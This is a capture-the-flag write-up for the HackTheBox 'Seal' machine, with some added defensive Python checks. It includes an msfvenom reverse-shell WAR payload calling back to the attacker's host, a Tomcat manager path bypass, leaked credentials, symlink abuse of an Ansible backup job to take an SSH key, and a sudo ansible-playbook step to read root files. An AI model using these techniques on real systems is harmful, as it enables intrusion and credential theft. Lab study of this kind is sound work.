HackTheBox-Seal


---
title: HackTheBox-Seal
author: CrazyInSide
layout: true
categories: HackTheBox
cover: https://www.worldisend.com/img/Seal.png
tags:
  - Linux
---


```
CrazyInSide:~/HackTheBox$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.250
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-09-01 10:04:57 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 8080/tcp on 10.10.10.250
Discovered open port 443/tcp on 10.10.10.250
Discovered open port 22/tcp on 10.10.10.250

CrazyInSide:~/HackTheBox$ sudo nmap -sC -sV 10.10.10.250 -p8080,443,22
Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-09-01 18:09 CST
Nmap scan report for 10.10.10.250
Host is up (0.083s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4b894739673d07315e3f4c27411ff967 (RSA)
|   256 04a74f399565c5b08dd5492ed8440036 (ECDSA)
|_  256 b45e8393c54249de7125927123b18554 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
| tls-alpn: 
|_  http/1.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
|_http-title: Seal Market
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg: 
|_  http/1.1
8080/tcp open  http-proxy
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Thu, 01 Sep 2022 10:10:04 GMT
|     Set-Cookie: JSESSIONID=node02q9tfbpnsxre1bm1gkv3wal0a2.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   GetRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Thu, 01 Sep 2022 10:10:03 GMT
|     Set-Cookie: JSESSIONID=node0yvbmr291moot13csk9lwzfixi0.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Thu, 01 Sep 2022 10:10:04 GMT
|     Set-Cookie: JSESSIONID=node01jub9w55x03xg1mawzh2zjn5sd1.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   Socks4: 
|     HTTP/1.1 400 Illegal character CNTL=0x4
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
|   Socks5: 
|     HTTP/1.1 400 Illegal character CNTL=0x5
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://ParrotOS.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.34 seconds
zsh: segmentation fault  sudo nmap -sC -sV 10.10.10.250 -p8080,443,22
```

The site on 443 has a search box, but it appears to call Google Maps rather than anything on the server. Port 8080 hosts a GitBucket instance.

This application has a known historical vulnerability:

```
CrazyInSide:~/HackTheBox$ searchsploit GitBucket
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
GitBucket 4.23.1 - Remote Code Execution                                            | java/webapps/44668.py
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
```

However, the exploit's documentation states that it only works against Windows servers. I tried registering an account instead. The target appears to have Tomcat deployed, and in the commit history of the Tomcat repository on GitBucket a set of credentials can be found:

username="tomcat" password="42MrHBf*z8{Z%"

I then started directory enumeration on port 80:

```
CrazyInSide:~/HackTheBox$ dirsearch -u https://seal.htb/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/crazyinside/.dirsearch/reports/seal.htb/-_22-09-01_18-51-03.txt

Error Log: /home/crazyinside/.dirsearch/logs/errors-22-09-01_18-51-03.log

Target: https://seal.htb/

[18:51:04] Starting: 
[18:51:05] 302 -    0B  - /js  ->  http://seal.htb/js/
[18:51:31] 400 -  804B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[18:51:33] 400 -  804B  - /a%5c.aspx
[18:51:36] 302 -    0B  - /admin  ->  http://seal.htb/admin/
[18:52:05] 302 -    0B  - /css  ->  http://seal.htb/css/
[18:52:15] 403 -  564B  - /host-manager/html
[18:52:16] 302 -    0B  - /host-manager/  ->  http://seal.htb/host-manager/html
[18:52:16] 302 -    0B  - /icon  ->  http://seal.htb/icon/
[18:52:16] 302 -    0B  - /images  ->  http://seal.htb/images/
[18:52:18] 200 -   19KB - /index.html
[18:52:26] 302 -    0B  - /manager  ->  http://seal.htb/manager/
[18:52:26] 403 -  564B  - /manager/html
[18:52:26] 302 -    0B  - /manager/  ->  http://seal.htb/manager/html
[18:52:26] 403 -  564B  - /manager/html/
[18:52:26] 401 -    2KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[18:52:26] 401 -    2KB - /manager/jmxproxy
[18:52:26] 401 -    2KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[18:52:26] 401 -    2KB - /manager/status/all
[18:52:26] 401 -    2KB - /manager/jmxproxy/?qry=STUFF
[18:52:26] 401 -    2KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[18:52:26] 401 -    2KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage&key=used
[18:52:26] 401 -    2KB - /manager/jmxproxy/?set=Catalina%3Atype%3DValve%2Cname%3DErrorReportValve%2Chost%3Dlocalhost&att=debug&val=cow
[18:52:26] 401 -    2KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[18:52:26] 401 -    2KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS

Task Completed
```

The site appears to be running Tomcat, since http://seal.htb/manager/html is Tomcat's default manager path. But why is the redirect to plain http? I started reading through the nginx configuration:

It seems these locations require the client to present a certificate, and if that check passes the request is proxied to port 8000 on the target. The path check is easy to get around, because it only matches the literal string /manager/html. Requesting /manager;/html instead is enough, after which I enter the Tomcat credentials found earlier:
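Why the `;` matters, as an added illustration that is not part of the original writeup and is not nginx's or Tomcat's own code: the two functions below approximate how each side normalises a request path before matching it (an assumption written for this example), so a defender can list the paths on which a front-end prefix check and the backend's resource resolution disagree. The point is that access control for `/manager/html` has to be enforced by the servlet container itself, not by a string match on the path in front of it.

```python
from urllib.parse import unquote


def _collapse(segments):
    """Resolve '.' and '..' segments, which both nginx and Tomcat do."""
    out = []
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def nginx_view(raw_path: str) -> str:
    """Approximation of the path nginx matches a `location` block against:
    percent-decoded and dot-collapsed, but a ';param' suffix stays in its segment."""
    return _collapse(unquote(seg) for seg in raw_path.split("/"))


def servlet_view(raw_path: str) -> str:
    """Approximation of the path a servlet container maps to a resource:
    as above, but each segment's ';param' path parameter is stripped first."""
    return _collapse(unquote(seg).split(";", 1)[0] for seg in raw_path.split("/"))


def proxy_mismatch(raw_path: str, protected: str = "/manager/html") -> dict:
    """Compare the two views of one request.

    'front_end_blocks'    - what a literal prefix match on the nginx side decides
    'backend_resolves_to' - the resource the container would actually serve
    'mismatch'            - the front end lets it through but the backend lands on
                            the protected path, i.e. the proxy-level check is not
                            what protects the resource.
    """
    front = nginx_view(raw_path)
    back = servlet_view(raw_path)
    return {
        "front_end_blocks": front.startswith(protected),
        "backend_resolves_to": back,
        "mismatch": (not front.startswith(protected)) and back.startswith(protected),
    }


if __name__ == "__main__":
    for p in ["/manager/html", "/manager/%68tml", "/manager/./html", "/manager;/html"]:
        print(p, proxy_mismatch(p))
```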

With manager access, generating a WAR package and deploying it through the manager is all that is needed:

```
CrazyInSide:~/HackTheBox$ msfvenom -p java/shell_reverse_tcp lhost=10.10.16.6 lport=1337 -f war -o test.war
Payload size: 13316 bytes
Final size of war file: 13316 bytes
Saved as: test.war
CrazyInSide:~/HackTheBox$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.250] 43076
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
script -qc /bin/bash /dev/null
tomcat@seal:/var/lib/tomcat9$ 
```

There is a backups folder under /opt:

```
tomcat@seal:/opt/backups$ ls
archives  playbook
tomcat@seal:/opt/backups$ cd archives/
tomcat@seal:/opt/backups/archives$ ls
backup-2022-09-01-12:30:32.gz  backup-2022-09-01-12:31:33.gz
tomcat@seal:/opt/backups/archives$ cat ../playbook/run.yml 
- hosts: localhost
  tasks:
  - name: Copy Files
    synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
  - name: Server Backups
    archive:
      path: /opt/backups/files/
      dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
  - name: Clean
    file:
      state: absent
      path: /opt/backups/files/
tomcat@seal:/opt/backups/archives$ 
```

It looks like a scheduled task periodically copies /var/lib/tomcat9/webapps/ROOT/admin/dashboard and archives it into the backups directory.

```
tomcat@seal:/opt/backups/archives$ ls -all
total 2968
drwxrwxr-x 2 luis luis   4096 Sep  1 12:34 .
drwxr-xr-x 4 luis luis   4096 Sep  1 12:34 ..
-rw-rw-r-- 1 luis luis 606047 Sep  1 12:30 backup-2022-09-01-12:30:32.gz
-rw-rw-r-- 1 luis luis 606047 Sep  1 12:31 backup-2022-09-01-12:31:33.gz
-rw-rw-r-- 1 luis luis 606047 Sep  1 12:32 backup-2022-09-01-12:32:33.gz
-rw-rw-r-- 1 luis luis 606047 Sep  1 12:33 backup-2022-09-01-12:33:33.gz
-rw-rw-r-- 1 luis luis 606047 Sep  1 12:34 backup-2022-09-01-12:34:33.gz
tomcat@seal:/opt/backups/archives$ 
```

The archives are owned by the luis user, so the backup job runs as luis, and the uploads directory in the dashboard tree is world-readable, writable and executable:

```
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ls -all
total 100
drwxr-xr-x 7 root root  4096 May  7  2021 .
drwxr-xr-x 3 root root  4096 May  6  2021 ..
drwxr-xr-x 5 root root  4096 Mar  7  2015 bootstrap
drwxr-xr-x 2 root root  4096 Mar  7  2015 css
drwxr-xr-x 4 root root  4096 Mar  7  2015 images
-rw-r--r-- 1 root root 71744 May  6  2021 index.html
drwxr-xr-x 4 root root  4096 Mar  7  2015 scripts
drwxrwxrwx 2 root root  4096 May  7  2021 uploads
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ln -s /home/luis /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads
```

I place a symlink to luis's home directory inside uploads. Because synchronize runs with copy_links=yes, the next run follows it, and shortly afterwards a much larger backup appears:

```
tomcat@seal:/opt/backups/archives$ ls -all
total 113612
drwxrwxr-x 2 luis luis      4096 Sep  1 12:36 .
drwxr-xr-x 4 luis luis      4096 Sep  1 12:36 ..
-rw-rw-r-- 1 luis luis    606047 Sep  1 12:35 backup-2022-09-01-12:35:33.gz
-rw-rw-r-- 1 luis luis 115723773 Sep  1 12:36 backup-2022-09-01-12:36:32.gz
tomcat@seal:/opt/backups/archives$ cp backup-2022-09-01-12\:36\:32.gz /tmp
tomcat@seal:/opt/backups/archives$ cd /tmp
tomcat@seal:/tmp$ tar xf backup-2022-09-01-12\:36\:32.gz --force-local
tomcat@seal:/tmp$ ls
backup-2022-09-01-12:30:32.gz  dashboard          pwk.py       tmpypck0ak1
backup-2022-09-01-12:36:32.gz  hsperfdata_tomcat  tmp7e2a49nn
tomcat@seal:/tmp$ ls -all
total 113636
drwxrwxrwt  6 root   root        4096 Sep  1 12:38 .
drwxr-xr-x 20 root   root        4096 Jul 26  2021 ..
-rw-r-----  1 tomcat tomcat    606047 Sep  1 12:30 backup-2022-09-01-12:30:32.gz
-rw-r-----  1 tomcat tomcat 115723773 Sep  1 12:37 backup-2022-09-01-12:36:32.gz
drwxr-x---  7 tomcat tomcat      4096 May  7  2021 dashboard
drwxr-x---  2 tomcat tomcat      4096 Sep  1 10:00 hsperfdata_tomcat
-rw-r-----  1 tomcat tomcat      3448 Sep  1 12:23 pwk.py
drwx------  4 tomcat tomcat      4096 Sep  1 12:24 tmp7e2a49nn
drwx------  4 tomcat tomcat      4096 Sep  1 12:24 tmpypck0ak1
tomcat@seal:/tmp$ cd dashboard/
tomcat@seal:/tmp/dashboard/uploads/luis$ ls -all
total 51320
drwxr-x--- 9 tomcat tomcat     4096 May  7  2021 .
drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 ..
drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .ansible
-rw-r----- 1 tomcat tomcat      220 May  5  2021 .bash_logout
-rw-r----- 1 tomcat tomcat     3797 May  5  2021 .bashrc
drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .cache
drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .config
drwxr-x--- 7 tomcat tomcat     4096 Sep  1 12:38 .gitbucket
-rw-r----- 1 tomcat tomcat 52497951 Jan 14  2021 gitbucket.war
drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .java
drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .local
-rw-r----- 1 tomcat tomcat      807 May  5  2021 .profile
drwx------ 2 tomcat tomcat     4096 Sep  1 12:38 .ssh
-r-------- 1 tomcat tomcat       33 Sep  1 10:00 user.txt
tomcat@seal:/tmp/dashboard/uploads/luis$ cat user.txt 
98f4bf24..............................
```
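The synchronize task runs with copy_links=yes, so a symlink dropped into the world-writable uploads directory is followed and the link target's contents end up in an archive owned by a different user. As an added defensive example (not part of the original writeup and not code from the box), a pre-backup check that lists every symlink whose resolved target leaves the source tree, run here against a constructed directory layout that mirrors the dashboard/uploads structure above:

```python
import os
import tempfile


def escaping_symlinks(root: str) -> list:
    """Return (link_path, resolved_target) for every symlink under `root` whose
    target resolves outside `root`. os.walk is told not to follow links, so a
    link to a directory is reported rather than descended into."""
    root_real = os.path.realpath(root)
    found = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if os.path.commonpath([root_real, target]) != root_real:
                found.append((path, target))
    return found


def safe_to_archive(root: str) -> bool:
    """A backup job should refuse to run (or run without copy_links) when the
    source tree contains links that escape it."""
    return not escaping_symlinks(root)


def demo() -> dict:
    """Constructed layout (sample data, not the box's files): a dashboard tree with
    a world-writable uploads/ directory into which a link to a home directory was
    placed, plus a harmless link that stays inside the tree."""
    base = tempfile.mkdtemp()
    dashboard = os.path.join(base, "dashboard")
    uploads = os.path.join(dashboard, "uploads")
    home = os.path.join(base, "home", "victim")
    os.makedirs(uploads)
    os.chmod(uploads, 0o777)
    os.makedirs(home)
    with open(os.path.join(home, "id_rsa"), "w") as fh:
        fh.write("constructed placeholder, not a real key\n")
    open(os.path.join(dashboard, "index.html"), "w").close()
    os.symlink(home, os.path.join(uploads, "victim"))            # escapes the tree
    os.symlink("../index.html", os.path.join(uploads, "idx"))    # stays inside
    return {
        "safe": safe_to_archive(dashboard),
        "escaping": [os.path.relpath(p, dashboard) for p, _ in escaping_symlinks(dashboard)],
    }


if __name__ == "__main__":
    print(demo())
```

In the playbook itself the same exposure is removed at the source: the synchronize module's copy_links option defaults to no, and a directory that unprivileged users can write to should not be archived by a more privileged account.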

The user's SSH private key is in the extracted copy:

```
tomcat@seal:/tmp/dashboard/uploads/luis/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub
tomcat@seal:/tmp/dashboard/uploads/luis/.ssh$ cat id_rsa

CrazyInSide:~/HackTheBox$ ssh -i id_rsa luis@10.10.10.250    
The authenticity of host '10.10.10.250 (10.10.10.250)' can't be established.
ED25519 key fingerprint is SHA256:CK0IgtHX4isQwWAPna6oD88DnRAM9OacxQExxLSnlL0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.250' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 01 Sep 2022 12:41:22 PM UTC

  System load:  0.29              Processes:             165
  Usage of /:   49.2% of 9.58GB   Users logged in:       0
  Memory usage: 30%               IPv4 address for eth0: 10.10.10.250
  Swap usage:   0%

 * Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!
     https://microk8s.io/

22 updates can be applied immediately.
15 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri May  7 07:00:18 2021 from 10.10.14.2
luis@seal:~$ 
luis@seal:~$ sudo -l
Matching Defaults entries for luis on seal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User luis may run the following commands on seal:
    (ALL) NOPASSWD: /usr/bin/ansible-playbook *
luis@seal:~$ cat run.yml 
- hosts: localhost
  tasks:
  - name: cat
    shell: cat /root/root.txt > flag.txt
    register: out
  - name: stdout
    debug: msg=""
  - name: stderr
    debug: msg=""
luis@seal:~$ sudo /usr/bin/ansible-playbook run.yml 
[WARNING]: provided hosts list is empty, only localhost is available. Note that the implicit localhost does not match 'all'

PLAY [localhost] ***************************************************************

TASK [Gathering Facts] *********************************************************
ok: [localhost]

TASK [cat] *********************************************************************
changed: [localhost]

TASK [stdout] ******************************************************************
ok: [localhost] => {
    "msg": ""
}

TASK [stderr] ******************************************************************
ok: [localhost] => {
    "msg": ""
}

PLAY RECAP *********************************************************************
localhost                  : ok=4    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

luis@seal:~$ ls
flag.txt  gitbucket.war  run.yml  user.txt
luis@seal:~$ cat flag.txt 
9b0c..............................
luis@seal:~$ 
```

